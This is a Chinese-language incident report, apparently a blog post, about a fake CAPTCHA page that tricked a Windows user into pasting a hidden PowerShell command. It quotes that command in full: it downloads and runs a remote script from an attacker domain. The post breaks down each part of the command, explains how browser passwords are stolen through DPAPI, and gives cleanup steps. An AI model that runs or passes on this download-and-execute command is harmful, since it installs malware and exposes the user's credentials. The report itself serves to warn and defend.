news 2026/7/5 4:50:31

网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本

网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本

报告编号:SEC-20260630-001
报告日期:2026年6月30日
报告人:工业废气
受影响设备:个人计算机(Windows系统)
事件等级:中危(恶意代码执行,凭证泄露风险高)


一、事件概述

2026年6月30日,用户访问一个长期无法正常连接的BT下载网站时,被重定向至恶意域名claspopclicktodayinstantly.monster。该页面伪装成CAPTCHA人机验证,诱导用户通过“Win+X”运行一段经过伪装的恶意PowerShell命令。用户执行命令后,安全软件(360安全卫士)成功拦截了后续释放的木马程序,但命令在内存中执行时可能已完成对浏览器保存密码等敏感信息的窃取。

二、攻击时间线

时间节点事件描述
今天早些时候访问已失效的BT站,被跳转至恶意钓鱼页面
跳转后页面显示“人机验证”,要求按Win+X再按I键粘贴命令
执行命令运行恶意PowerShell命令,系统以隐藏窗口执行
命令执行后从远程下载恶意脚本,在内存中执行,释放木马至Temp目录
随后360拦截进程创建(conhost.exe),删除木马文件
当前状态用户再次访问该BT站已无法连接,恶意跳转已消失

三、攻击手段技术分析

3.1 初始入侵点(跳转机制)
  • 原BT站域名已长期无法访问,本次跳转并非原站被篡改,极可能是由DNS污染/劫持本机hosts文件被篡改路由器DNS被恶意修改所致。
  • 跳转目标claspopclicktodayinstantly.monster具有典型的一次性诈骗域名特征(随机词堆叠、廉价顶级域)。
3.2 社会工程学诱导
  • 页面模仿正规的CAPTCHA人机验证流程,要求用户执行组合键Win+X,再按下I键打开PowerShell,并粘贴一段看似含有“验证ID”的代码。
  • 代码中的注释<#Verification ID: 35300a89e82c4da3#>增强了欺骗性,降低用户警惕性。
3.3 攻击来源识别

执行的命令为:

powershell-w h"iex(irm 'idverification-cdn.info/35300a89e82c4da3' -UseBasicParsing)";exit<#Verification ID: 35300a89e82c4da3#>

各部分功能:

组件含义
-w h-WindowStyle Hidden,隐藏PowerShell窗口
iexInvoke-Expression,将从网络获取的字符串作为代码执行
irmInvoke-RestMethod,从指定URL下载内容
idverification-cdn.info/...攻击者控制的载荷存放地址(含追踪ID)
; exit执行后立即退出,减少暴露窗口
<#...#>PowerShell块注释,伪装成“验证ID”

该技术属于典型的无文件攻击(Fileless Malware):恶意代码全程在内存中运行,不直接写入磁盘,绕过传统基于文件的杀毒检测。直到最后释放的.exe文件被360拦截。

3.4 密码窃取原理

攻击者一旦在用户账户下运行,便可利用Windows数据保护接口(DPAPI)解密存储在Microsoft Edge浏览器中的密码。因为用户已登录系统,DPAPI会自动提供解密密钥。因此,内存中的脚本可以轻松读取并上传浏览器中所有保存的网站明文密码、Cookie等信息。

四、已发生的恶意行为与拦截情况

  • 恶意进程释放:木马文件fhdnhrxs.ioz.exe被释放到C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\

  • 进程创建企图:木马试图创建子进程C:\Windows\System32\conhost.exe,以承载后续后门或记录行为。

  • 安全软件响应:360安全卫士实时防护模块识别为Trojan.Generic,成功拦截进程创建并删除木马文件。

  • 进程:C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\fhdnhrxs.ioz.exe 动作:进程创建 路径:C:\Windows\System32\conhost.exe 拦截补充描述:有木马试图攻击您的电脑,360已成功拦截。 防护信息: AD|1, 4|10, 70, 10||
    木马名称:Trojan.Generic 所在路径:C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\fhdnhrxs.ioz.exe

五、潜在风险与影响评估

尽管木马落地组件被清除,但由于PowerShell命令已在内存中执行,以下风险仍可能已经发生

  1. 浏览器凭证泄露:Edge中保存的所有密码、Cookie极可能已被明文上传至攻击者服务器。
  2. 令牌与会话窃取:部分网站的自动登录令牌可能被盗,导致攻击者能绕过密码直接登录。
  3. 系统残留:恶意命令可能修改了系统hosts文件、设置了代理,或创建了计划任务以维持长期访问。
  4. 二次跳板:该BT站域名被篡改的解析记录可能仍存在于本地DNS缓存或网络设备中,存在再次被跳转的风险。

六、已采取及建议的处置措施

6.1 立即执行(已完成或正在进行)
  • 360安全卫士实时防护拦截并清除了木马文件。
  • 确认恶意进程未继续运行。
  • 在手机或其他未受影响的设备上,立即修改所有在Edge中保存过的网站密码(重点:邮箱、网银、社交账号)。
  • 为所有重要账户开启双因素认证(2FA)
6.2 系统排查与清理(务必执行)
  1. 检查hosts文件
    用记事本打开C:\Windows\System32\drivers\etc\hosts,删除任何指向该BT站域名的条目。
  2. 检查系统代理设置
    进入“设置 → 网络和 Internet → 代理”,确保“使用代理服务器”为关闭状态,且无异常自动配置脚本。
  3. 检查浏览器扩展与快捷方式
    • 打开edge://extensions,移除非必要的可疑扩展。
    • 检查Edge快捷方式属性,确保目标路径后无恶意加载参数。
  4. 检查任务计划程序
    打开“任务计划程序”,查找近期创建的名称随机或内容可疑的任务,确认后删除。
  5. 检查路由器DNS
    登录路由器管理后台,确认DHCP分配DNS未被篡改(推荐改用1.1.1.18.8.8.8)。
  6. 启用DNS安全
    在Edge中启用“使用安全的DNS”,选择Cloudflare或Google,规避DNS污染。
  7. 全盘扫描
    使用360安全卫士执行“全盘扫描”,并用Malwarebytes等第二意见扫描器进行交叉查杀。
  8. 清理浏览器数据
    edge://settings/siteData中搜索并删除该BT站域名及恶意跳转域名的所有存储数据。
6.3 长期加固建议
  • 提高安全意识:任何要求通过“Win+X”粘贴代码的验证方法均为欺诈,应立即关闭页面。
  • 定期修改重要密码,不重复使用相同密码。
  • 使用密码管理器(如Bitwarden)替代浏览器原生密码存储,可提供更强的防护。

七、结论

本次事件是一起结合了DNS劫持/污染社会工程学无文件攻击的复合型网络攻击。攻击者利用用户对失效网站的访问惯性和对CAPTCHA“安全性”的默认信任,将流量诱导至精心设计的钓鱼页面,进而窃取敏感凭证。得益于安全软件的行为拦截,木马未能在本地建立持久化后门,但信息泄露风险仍然较高。当前最紧迫的行动是彻底修改受影响密码,并完成上述系统排查项目,以根除残留隐患和防止二次跳转。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/5 0:06:41

小白可懂的保姆级 Redis 教程

你是小阿巴&#xff0c;刚入职的程序员。 这天&#xff0c;产品经理找到你&#xff1a;阿巴阿巴&#xff0c;用户吐槽咱们网站首页加载太慢&#xff0c;快优化&#xff01; 你打开监控一看&#xff0c;好家伙&#xff01;每秒有上万个用户在访问首页&#xff0c;每次都要查询 …

作者头像 李华
网站建设 2026/7/4 17:13:53

ponytail爆火:专治AI编程过度造轮子,代码直接砍半

文章目录前言一、AI agent的通病&#xff1a;热心过头二、ponytail&#xff1a;给AI戴上紧箍咒七级阶梯&#xff1a;从"别写"到"少写"三、实测&#xff1a;不是吹牛&#xff0c;是真降四、边界感&#xff1a;懒得有原则五、给我们的启示P.S. 目前国内还是很…

作者头像 李华
网站建设 2026/7/4 18:15:57

解密 MCP:开启 AI 与数据交互的新标准

引言&#xff1a;AI 工具集成的困境与 MCP 的诞生当大语言模型从实验室走向生产环境&#xff0c;开发者很快遇到了一个共同的难题&#xff1a;如何让 AI 安全、高效地访问外部世界的数据与工具&#xff1f;在 2024 年之前&#xff0c;这个问题没有标准答案。如果你是一个 AI Ag…

作者头像 李华
网站建设 2026/7/4 16:58:29

新课标下,小学数学最需要的能力不是“算得快“,而是“想得通“

一条被大多数家长忽略的教育真相一、一个让10个家长9个懵的问题先问一个问题&#xff0c;看看你能不能答上来。小学数学新课标&#xff08;2022版&#xff09;反复提到一个词&#xff0c;这个词过去20年的课标里几乎没出现过——但它直接决定了孩子未来初中数学能不能跟得上。猜…

作者头像 李华
网站建设 2026/7/4 23:07:17

深入认识ClassLoader - 一次投产失败的复盘

正好我也在旁边&#xff0c;记录下一起排查解决的过程。 定位与解决问题 分析错误日志 拉了版本分支代码&#xff0c;从下往上看输出的错误日志&#xff0c;发现是DruidDataSourceWrapper这个类中40行出错&#xff0c;看下这个类以及出错的位置&#xff1a; ConfigurationP…

作者头像 李华
网站建设 2026/7/4 20:00:36

DeepSeek美化-为 DeepSeek 网页版引入 Obsidian Border 主题视觉风格

简介 访问脚本发布页面&#xff1a; DeepSeek 美化 - Greasy Fork DeepSeek-Refined 是一款基于 Tampermonkey 的用户脚本&#xff0c;适用于 DeepSeek Chat 网页版 (chat.deepseek.com)。该脚本通过覆写 DeepSeek 的 CSS 自定义属性&#xff0c;将 Obsidian Border 主题 的标…

作者头像 李华